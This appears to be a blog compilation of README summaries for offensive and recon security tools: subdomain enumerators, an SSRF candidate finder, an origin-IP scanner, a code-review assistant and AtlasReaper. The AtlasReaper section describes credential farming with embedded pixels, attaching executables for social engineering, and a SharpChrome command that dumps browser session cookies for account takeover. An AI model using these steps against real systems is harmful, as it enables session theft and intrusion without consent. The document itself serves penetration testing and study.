    This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

    CREDIT

    Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

    DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

    Logo: cobracode

    Tool was inspired by Bishop Fox's project called spoofcheck.



    DakshSCRA - Source Code Review Assist

    By: Zion3R


    Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

    Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

    What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


    Debut

    Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was presented to a specific audience with a deliberately low-profile approach, avoiding any major announcements.

    While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

    Features and Functionalities

    Distinctive Features (Multiple World's Firsts)

    • Identifies Areas of Interest in Source Code: Encourages focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

    • Identifies Areas of Interest in File Paths (World's First): Recognises patterns in file paths to pinpoint relevant sections for review.

    • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

    • Automated Scientific Effort Estimation for Code Review (World's First): Provides a measurable approach for estimating the effort required for a code review.

    Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

    Additionally, the tool offers the following functionalities:

    • Options to use platform-specific rules for finding areas of interest
    • Options to extend or add new rules for any new or existing languages
    • Generates reports in text, HTML, and PDF formats for inspection

    Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

    Feel free to contribute towards updating or adding new rules and future development.

    If you find any bugs, report them to d3basis.m0hanty@gmail.com.

    Tool Setup

    Pre-requisites

    Python3 and all the libraries listed in requirements.txt

    Setting up environment to run this tool

    1. Setup a virtual environment

    $ pip install virtualenv

    $ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
    Example: virtualenv -p python3 venv

    $ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
    Example: source venv/bin/activate

    After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

    2. Ensure all required libraries are installed within the virtual environment

    You must run the below command after activating the virtual environment as mentioned in the previous steps.

    pip install -r requirements.txt

    Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

    Tool Usage

    $ python3 dakshscra.py -h // To view available options and arguments

    usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

    options:
    -h, --help show this help message and exit
    -r RULE_FILE Specify platform specific rule name
    -f FILE_TYPES Specify file types to scan
    -v Specify verbosity level {'-v', '-vv', '-vvv'}
    -t TARGET_DIR Specify target directory path
    -l {R,RF}, --list {R,RF}
    List rules [R] OR rules and filetypes [RF]
    -recon Detects platform, framework and programming language used
    -estimate Estimate efforts required for code review

    Example Usage

    $ python3 dakshscra.py // To view tool usage along with examples

    Examples:
    # '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
    dakshscra.py -r php -t /source_dir_path

    # To override default settings, other filetypes can be specified with the '-f' option.
    dakshscra.py -r php -f dotnet -t /path_to_source_dir
    dakshscra.py -r php -f custom -t /path_to_source_dir

    # Perform reconnaissance and rule-based scanning if '-recon' is used with the '-r' option.
    dakshscra.py -recon -r php -t /path_to_source_dir

    # Perform only reconnaissance if '-recon' is used without the '-r' option.
    dakshscra.py -recon -t /path_to_source_dir

    # Verbosity: '-v' is default; '-vvv' will display all rule checks within each rule category.
    dakshscra.py -r php -vv -t /path_to_source_dir


    Supported RULE_FILE: dotnet, java, php, javascript
    Supported FILE_TYPES: dotnet, php, java, custom, allfiles

    Reports

    The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

    Scanning (Areas of Security Concerns) Report

    HTML Report:
    • DakshSCRA/reports/html/report.html
    PDF Report:
    • DakshSCRA/reports/html/report.pdf
    RAW TEXT Based Reports:
    • Areas of Interest - Identified Patterns : DakshSCRA/reports/text/areas_of_interest.txt
    • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
    • Identified Project Files: DakshSCRA/runtime/filepaths.txt

    Reconnaissance (Recon) Report

    • Reconnaissance Summary: /reports/text/recon.txt

    Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

    Code Review Effort Estimation Report

    • Effort estimation report: /reports/html/estimation.html

    Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

    Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



    Nodesub - Command-Line Tool For Finding Subdomains In Bug Bounty Programs

    By: Zion3R


    Nodesub is a command-line tool for finding subdomains in bug bounty programs. It supports various subdomain enumeration techniques and provides flexible options for customization.


    Features

    • Perform subdomain enumeration using CIDR notation (an input list is supported); see the sketch after this list.
    • Perform subdomain enumeration using ASN (an input list is supported).
    • Perform subdomain enumeration using a list of domains.
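
    As a rough illustration of the CIDR-based technique, the sketch below performs a reverse-DNS sweep over a range, which is one common way to turn a CIDR block into hostnames. This is a Python illustration of the idea only, not Nodesub's actual (Node.js) implementation:

    import ipaddress
    import socket

    def reverse_sweep(cidr):
        # Reverse-resolve every address in the range and keep any hostnames found
        results = {}
        for ip in ipaddress.ip_network(cidr, strict=False).hosts():
            try:
                hostname, _, _ = socket.gethostbyaddr(str(ip))
                results[str(ip)] = hostname
            except (socket.herror, socket.gaierror):
                pass  # no PTR record (or lookup failure) for this address
        return results

    print(reverse_sweep("192.168.0.0/24"))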

    Installation

    To install Nodesub, use the following command:

    npm install -g nodesub

    NOTE:

    • Edit File ~/.config/nodesub/config.ini

    Usage

    nodesub -h

    This will display help for the tool. Here are all the switches it supports.

    Examples
    • Enumerate subdomains for a single domain:

       nodesub -u example.com
    • Enumerate subdomains for a list of domains from a file:

       nodesub -l domains.txt
    • Perform subdomain enumeration using CIDR:

      node nodesub.js -c 192.168.0.0/24 -o subdomains.txt

      node nodesub.js -c CIDR.txt -o subdomains.txt

    • Perform subdomain enumeration using ASN:

      node nodesub.js -a AS12345 -o subdomains.txt
      node nodesub.js -a ASN.txt -o subdomains.txt
    • Enable recursive subdomain enumeration and output the results to a JSON file:

       nodesub -u example.com -r -o output.json -f json

    Output

    The tool provides various output formats for the results, including:

    • Text (txt)
    • JSON (json)
    • CSV (csv)
    • PDF (pdf)

    The output file contains the resolved subdomains, failed resolved subdomains, or all subdomains based on the options chosen.



    AtlasReaper - A Command-Line Tool For Reconnaissance And Targeted Write Operations On Confluence And Jira Instances

    By: Zion3R



    AtlasReaper is a command-line tool developed for offensive security purposes, primarily focused on reconnaissance of Confluence and Jira. It also provides various features that can be helpful for tasks such as credential farming and social engineering. The tool is written in C#.


    Blog post: Sowing Chaos and Reaping Rewards in Confluence and Jira

                                                       .@@@@
    @@@@@
    @@@@@ @@@@@@@
    @@@@@ @@@@@@@@@@@
    @@@@@ @@@@@@@@@@@@@@@
    @@@@, @@@@ *@@@@
    @@@@ @@@ @@ @@@ .@@@
    _ _ _ ___ @@@@@@@ @@@@@@
    /_\| |_| |__ _ __| _ \___ __ _ _ __ ___ _ _ @@ @@@@@@@@
    / _ \ _| / _` (_-< / -_) _` | '_ \/ -_) '_| @@ @@@@@@@@
    /_/ \_\__|_\__,_/__/_|_\___\__,_| .__/\___|_| @@@@@@@@ &@
    |_| @@@@@@@@@@ @@&
    @@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@. @@
    @werdhaihai

    Usage

    AtlasReaper uses commands, subcommands, and options. The format for executing commands is as follows:

    .\AtlasReaper.exe [command] [subcommand] [options]

    Replace [command], [subcommand], and [options] with the appropriate values based on the action you want to perform. For more information about each command or subcommand, use the -h or --help option.

    Below is a list of available commands and subcommands:

    Commands

    Each command has subcommands for interacting with the specific product.

    • confluence
    • jira

    Subcommands

    Confluence

    • confluence attach - Attach a file to a page.
    • confluence download - Download an attachment.
    • confluence embed - Embed a 1x1 pixel image to perform farming attacks.
    • confluence link - Add a link to a page.
    • confluence listattachments - List attachments.
    • confluence listpages - List pages in Confluence.
    • confluence listspaces - List spaces in Confluence.
    • confluence search - Search Confluence.

    Jira

    • jira addcomment - Add a comment to an issue.
    • jira attach - Attach a file to an issue.
    • jira createissue - Create a new issue.
    • jira download - Download attachment(s) from an issue.
    • jira listattachments - List attachments on an issue.
    • jira listissues - List issues in Jira.
    • jira listprojects - List projects in Jira.
    • jira listusers - List Atlassian users.
    • jira searchissues - Search issues in Jira.

    Common Commands

    • help - Display more information on a specific command.

    Examples

    Here are a few examples of how to use AtlasReaper:

    • Search for a keyword in Confluence with wildcard search:

      .\AtlasReaper.exe confluence search --query "http*example.com*" --url $url --cookie $cookie

    • Attach a file to a page in Confluence:

      .\AtlasReaper.exe confluence attach --page-id "12345" --file "C:\path\to\file.exe" --url $url --cookie $cookie

    • Create a new issue in Jira:

      .\AtlasReaper.exe jira createissue --project "PROJ" --issue-type Task --message "I can't access this link from my host" --url $url --cookie $cookie

    Authentication

    Confluence and Jira can be configured to allow anonymous access. You can check this by omitting the -c/--cookie option from the commands.

    In the event authentication is required, you can dump cookies from a user's browser with SharpChrome or another similar tool.

    1. .\SharpChrome.exe cookies /showall

    2. Look for any cookies scoped to *.atlassian.net and named cloud.session.token or tenant.session.token

    Limitations

    Please note the following limitations of AtlasReaper:

    • The tool has not been thoroughly tested in all environments, so it's possible to encounter crashes or unexpected behavior. Efforts have been made to minimize these issues, but caution is advised.
    • AtlasReaper uses the cloud.session.token or tenant.session.token which can be obtained from a user's browser. Alternatively, it can use anonymous access if permitted. (API tokens or other auth is not currently supported)
    • For write operations, the username associated with the user session token (or "anonymous") will be listed.

    Contributing

    If you encounter any issues or have suggestions for improvements, please feel free to contribute by submitting a pull request or opening an issue in the AtlasReaper repo.



    Surf - Escalate Your SSRF Vulnerabilities On Modern Cloud Environments

    By: Zion3R


    surf allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending an HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.

    You can then attempt these hosts wherever an SSRF vulnerability may be present. Because most SSRF filters only focus on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(S) from your machine.

    Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.
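
    A rough Python sketch of that classification logic is shown below. surf itself is written in Go and uses httpx under the hood; this is only an illustration of the idea:

    import ipaddress
    import socket
    import urllib.request

    def classify(host, timeout=3):
        # Returns 'internal', 'external', or None (None means not an SSRF candidate)
        try:
            ip = ipaddress.ip_address(socket.gethostbyname(host))
        except (socket.gaierror, ValueError):
            return None  # host does not resolve at all
        try:
            urllib.request.urlopen(f"http://{host}", timeout=timeout)
            return None  # reachable from our machine, so not interesting
        except Exception:
            # unreachable from the outside: keep it as an SSRF candidate
            return "internal" if ip.is_private else "external"

    hosts = ["intranet.bigcorp.com", "www.bigcorp.com"]
    print({h: c for h in hosts if (c := classify(h)) is not None})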


    Installation

    This tool requires Go 1.19 or above, as we rely on httpx to do the HTTP probing.

    It can be installed with the following command:

    go install github.com/assetnote/surf/cmd/surf@latest

    Usage

    Consider that you have subdomains for bigcorp.com inside a file named bigcorp.txt, and you want to find all the SSRF candidates for these subdomains. Here are some examples:

    # find all ssrf candidates (including external IP addresses via HTTP probing)
    surf -l bigcorp.txt
    # find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
    surf -l bigcorp.txt -t 10 -c 200
    # find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
    surf -l bigcorp.txt -d
    # find all hosts that point to an internal/private IP address (no HTTP probing)
    surf -l bigcorp.txt -x

    The full list of settings can be found below:

    ❯ surf -h

    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•” β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
    β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•šβ•β•

    by shubs @ assetnote

    Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]

    Options:
    --hosts FILE, -l FILE
    List of assets (hosts or subdomains)
    --concurrency CONCURRENCY, -c CONCURRENCY
    Threads (passed down to httpx) - default 100 [default: 100]
    --timeout SECONDS, -t SECONDS
    Timeout in seconds (passed down to httpx) - default 3 [default: 3]
    --retries RETRIES, -r RETRIES
    Retries on failure (passed down to httpx) - default 2 [default: 2]
    --disablehttpx, -x Disable httpx and only output list of hosts that resolve to an internal IP address - default false [default: false]
    --disableanalysis, -d
    Disable analysis and only output list of hosts - default false [default: false]
    --help, -h display this help and exit

    Output

    When running surf, it will print the SSRF candidates to stdout, but it will also save two files inside the folder it is run from:

    • external-{timestamp}.txt - Hosts that resolve to an external IP but could not be reached over HTTP from your machine
    • internal-{timestamp}.txt - Hosts that resolve to an internal IP and, as expected, could not be reached over HTTP from your machine

    These two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.

    Acknowledgements

    Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.

    This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).



    Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

    By: Zion3R


    xsubfind3r is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.


    Features

    • Fetches domains from curated passive sources to maximize results.

    • Supports stdin and stdout for easy integration into workflows.

    • Cross-Platform (Windows, Linux & macOS).

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xsubfind3r-<version>-linux-amd64.tar.gz

    TIP: The above steps, download and extract, can be combined into a single step with this one-liner:

    curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

    ...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xsubfind3r.git 
    • Build the utility

       cd xsubfind3r/cmd/xsubfind3r && \
      go build .
    • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xsubfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

    xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys, while URLScan supports an API key but does not require one. API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file, which is created on first run and uses the YAML format. Multiple API keys can be specified for each of these sources, and one of them will be used.

    Example config.yaml:

    version: 0.3.0
    sources:
      - alienvault
      - anubis
      - bevigil
      - chaos
      - commoncrawl
      - crtsh
      - fullhunt
      - github
      - hackertarget
      - intelx
      - shodan
      - urlscan
      - wayback
    keys:
      bevigil:
        - awA5nvpKU3N8ygkZ
      chaos:
        - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
      fullhunt:
        - 0d9652ce-516c-4315-b589-9b241ee6dc24
      github:
        - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
        - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
      intelx:
        - 2.intelx.io:00000000-0000-0000-0000-000000000000
      shodan:
        - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
      urlscan:
        - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display help message for xsubfind3r use the -h flag:

    xsubfind3r -h

    help message:


    _ __ _ _ _____
    __ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
    \ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
    > <\__ \ |_| | |_) | _| | | | | (_| |___) | |
    /_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

    USAGE:
    xsubfind3r [OPTIONS]

    INPUT:
    -d, --domain string[] target domains
    -l, --list string target domains' list file path

    SOURCES:
    --sources bool list supported sources
    -u, --sources-to-use string[] comma(,) separated sources to use
    -e, --sources-to-exclude string[] comma(,) separated sources to exclude

    OPTIMIZATION:
    -t, --threads int number of threads (default: 50)

    OUTPUT:
    --no-color bool disable colored output
    -o, --output string output subdomains' file path
    -O, --output-directory string output subdomains' directory path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)

    Contribution

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    Columbus-Server - API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features

    By: Zion3R


    Columbus Project is an API-first, blazingly fast subdomain discovery and enumeration service with advanced features.

    Columbus returned 638 subdomains of tesla.com in 0.231 sec.


    Usage

    By default Columbus returns only the subdomains in a JSON string array:

    curl 'https://columbus.elmasy.com/lookup/github.com'

    But we think of the bash lovers, so if you don't want to mess with JSON and a newline separated list is your wish, then include the Accept: text/plain header.

    DOMAIN="github.com"

    curl -s -H "Accept: text/plain" "https://columbus.elmasy.com/lookup/$DOMAIN" | \
    while read SUB
    do
    if [[ "$SUB" == "" ]]
    then
    HOST="$DOMAIN"
    else
    HOST="${SUB}.${DOMAIN}"
    fi
    echo "$HOST"
    done
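
    The same lookup from Python, as a minimal sketch assuming the requests library is installed:

    import requests

    DOMAIN = "github.com"
    resp = requests.get(f"https://columbus.elmasy.com/lookup/{DOMAIN}",
                        headers={"Accept": "text/plain"}, timeout=10)
    resp.raise_for_status()
    for sub in resp.text.splitlines():
        # an empty entry refers to the apex domain itself
        print(f"{sub}.{DOMAIN}" if sub else DOMAIN)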

    For more, check the features or the API documentation.

    Entries

    Currently, entries are obtained from Certificate Transparency.

    Command Line

    Usage of columbus-server:
    -check
    Check for updates.
    -config string
    Path to the config file.
    -version
    Print version information.

    -check: Check the latest version on GitHub. Prints up-to-date and returns 0 if no update is required. Prints the latest tag (e.g. v0.9.1) and returns 1 if a new release is available. In case of error, prints the error message and returns 2.

    Build

    git clone https://github.com/elmasy-com/columbus-server
    make build

    Install

    Create a new user:

    adduser --system --no-create-home --disabled-login columbus-server

    Create a new group:

    addgroup --system columbus

    Add the new user to the new group:

    usermod -aG columbus columbus-server

    Copy the binary to /usr/bin/columbus-server.

    Make it executable:

    chmod +x /usr/bin/columbus-server

    Create a directory:

    mkdir /etc/columbus

    Copy the config file to /etc/columbus/server.conf.

    Set the permission to 0600.

    chmod -R 0600 /etc/columbus

    Set the owner of the config file:

    chown -R columbus-server:columbus /etc/columbus

    Install the service file (eg.: /etc/systemd/system/columbus-server.service).

    cp columbus-server.service /etc/systemd/system/

    Reload systemd:

    systemctl daemon-reload

    Start columbus:

    systemctl start columbus-server

    If you want Columbus to start automatically:

    systemctl enable columbus-server


    Chaos - Origin IP Scanning Utility Developed With ChatGPT

    By: Zion3R


    chaos is an 'origin' IP scanner developed by RST in collaboration with ChatGPT. It is a niche utility with an intended audience of mostly penetration testers and bug hunters.

    An origin-IP is a term-of-art expression describing the final public IP destination for websites that are publicly served via 3rd parties. If you'd like to understand more about why anyone might be interested in Origin-IPs, please check out our blog post.

    chaos was rapidly prototyped from idea to functional proof-of-concept in less than 24 hours using our principles of DevOps with ChatGPT.
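
    At its core, an origin-IP check is an ordinary HTTP request sent directly to a candidate IP while presenting the target FQDN in the Host header. Below is a minimal Python sketch of that single check, assuming the requests library is installed; it is an illustration only, not chaos.py itself:

    import requests

    def probe(ip, fqdn, port=80, timeout=3):
        # Request the candidate IP directly, but present the FQDN in the Host header.
        # Note: for HTTPS this simplified sketch does not set SNI to the FQDN.
        scheme = "https" if port == 443 else "http"
        try:
            r = requests.get(f"{scheme}://{ip}:{port}/",
                             headers={"Host": fqdn}, timeout=timeout, verify=False)
            return r.status_code
        except requests.RequestException:
            return None  # unresponsive candidate

    print(probe("203.0.113.10", "www.example.com"))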

    usage: chaos.py [-h] -f FQDN -i IP [-a AGENT] [-C] [-D] [-j JITTER] [-o OUTPUT] [-p PORTS] [-P] [-r] [-s SLEEP] [-t TIMEOUT] [-T] [-v] [-x] 
    _..._
    .-'` `'-.
    __|___________|__
    \ /
    `._ CHAOS _.'
    `-------`
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    /_____________________\\
    CHAtgpt Origin-ip Scanner
    _______ _______ _______ _______ _______
    |\\ /|\\ /|\\ /|\\ /|\\/|
    | +---+ | +---+ | +---+ | +---+ | +---+ |
    | |H | | |U | | |M | | |A | | |N | |
    | |U | | |S | | |A | | |N | | |C | |
    | |M | | |E | | |N | | |D | | |O | |
    | |A | | |R | | |C | | | | | |L | |
    | +---+ | +---+ | +---+ | +---+ | +---+ |
    |/_____|\\_____|\\_____|\\_____|\\_____\\

    Origin IP Scanner developed with ChatGPT
    cha*os (n): complete disorder and confusion
    (ver: 0.9.4)


    Features

    • Threaded for performance gains
    • Real-time status updates and progress bars, nice for large scans ;)
    • Flexible user options for various scenarios & constraints
    • Dataset reduction for improved scan times
    • Easy to use CSV output

    Installation

    1. Download / clone / unzip / whatever
    2. cd path/to/chaos
    3. pip3 install -U pip setuptools virtualenv
    4. virtualenv env
    5. source env/bin/activate
    6. (env) pip3 install -U -r ./requirements.txt
    7. (env) ./chaos.py -h

    Options

    -h, --help            show this help message and exit
    -f FQDN, --fqdn FQDN Path to FQDN file (one FQDN per line)
    -i IP, --ip IP IP address(es) for HTTP requests (Comma-separated IPs, IP networks, and/or files with IP/network per line)
    -a AGENT, --agent AGENT
    User-Agent header value for requests
    -C, --csv Append CSV output to OUTPUT_FILE.csv
    -D, --dns Perform fwd/rev DNS lookups on FQDN/IP values prior to request; no impact to testing queue
    -j JITTER, --jitter JITTER
    Add a 0-N second randomized delay to the sleep value
    -o OUTPUT, --output OUTPUT
    Append console output to FILE
    -p PORTS, --ports PORTS
    Comma-separated list of TCP ports to use (default: "80,443")
    -P, --no-prep Do not pre-scan each IP/port with `GET /` using `Host: {IP:Port}` header to eliminate unresponsive hosts
    -r, --randomize Randomize(ish) the order IPs/ports are tested
    -s SLEEP, --sleep SLEEP
    Add N seconds before thread completes
    -t TIMEOUT, --timeout TIMEOUT
    Wait N seconds for an unresponsive host
    -T, --test Test-mode; don't send requests
    -v, --verbose Enable verbose output
    -x, --singlethread Single threaded execution; for 1-2 core systems; default threads=(cores-1) if cores>2

    Examples

    Localhost Testing

    Launch python HTTP server

    % python3 -u -m http.server 8001
    Serving HTTP on :: port 8001 (http://[::]:8001/) ...

    Launch ncat as HTTP on a port detected as SSL; use a loop because --keep-open can hang

    % while true; do ncat -lvp 8443 -c 'printf "HTTP/1.0 204 Plaintext OK\n\n<html></html>\n"'; done
    Ncat: Version 7.94 ( https://nmap.org/ncat )
    Ncat: Listening on [::]:8443
    Ncat: Listening on 0.0.0.0:8443

    Also launch ncat as SSL on a port that will default to HTTP detection

    % while true; do ncat --ssl -lvp 8444 -c 'printf "HTTP/1.0 202 OK\n\n<html></html>\n"'; done    
    Ncat: Version 7.94 ( https://nmap.org/ncat )
    Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
    Ncat: SHA-1 fingerprint: 0208 1991 FA0D 65F0 608A 9DAB A793 78CB A6EC 27B8
    Ncat: Listening on [::]:8444
    Ncat: Listening on 0.0.0.0:8444

    Prepare an FQDN file:

    % cat ../test_localhost_fqdn.txt 
    www.example.com
    localhost.example.com
    localhost.local
    localhost
    notreally.arealdomain

    Prepare an IP file / list:

    % cat ../test_localhost_ips.txt 
    127.0.0.1
    127.0.0.0/29
    not_an_ip_addr
    -6.a
    =4.2
    ::1

    Run the scan

    • Note an IPv6 network added to IPs on the CLI
    • -p to specify the ports we are listening on
    • -x for single threaded run to give our ncat servers time to restart
    • -s0.2 short sleep for our ncat servers to restart
    • -t1 to timeout after 1 second
    % ./chaos.py -f ../test_localhost_fqdn.txt -i ../test_localhost_ips.txt,::1/126 -p 8001,8443,8444 -x -s0.2 -t1   
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost.local
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: notreally.arealdomain
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block =4.2
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block -6.a
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block not_an_ip_addr
    2023-06-21 12:48:33 [INFO] * ---- <META> ---- *
    2023-06-21 12:48:33 [INFO] * Version: 0.9.4
    2023-06-21 12:48:33 [INFO] * FQDN file: ../test_localhost_fqdn.txt
    2023-06-21 12:48:33 [INFO] * FQDNs loaded: ['www.example.com', 'localhost.example.com']
    2023-06-21 12:48:33 [INFO] * IP input value(s): ../test_localhost_ips.txt,::1/126
    2023-06-21 12:48:33 [INFO] * Addresses parsed from IP inputs: 12
    2023-06-21 12:48:33 [INFO] * Port(s): 8001,8443,8444
    2023-06-21 12:48:33 [INFO] * Thread(s): 1
    2023-06-21 12:48:33 [INFO] * Sleep value: 0.2
    2023-06-21 12:48:33 [INFO] * Timeout: 1.0
    2023-06-21 12:48:33 [INFO] * User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 ch4*0s/0.9.4
    2023-06-21 12:48:33 [INFO] * ---- </META> ---- *
    2023-06-21 12:48:33 [INFO] 36 unique address/port addresses for testing
    Prep Tests: 100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 36/36 [00:29<00:00, 1.20it/s]
    2023-06-21 12:49:03 [INFO] 9 IP/ports verified, reducing test dataset from 72 entries
    2023-06-21 12:49:03 [INFO] 18 pending tests remain after pre-testing
    2023-06-21 12:49:03 [INFO] Queuing 18 threads
    ++RCVD++ (200 OK) www.example.com @ :::8001
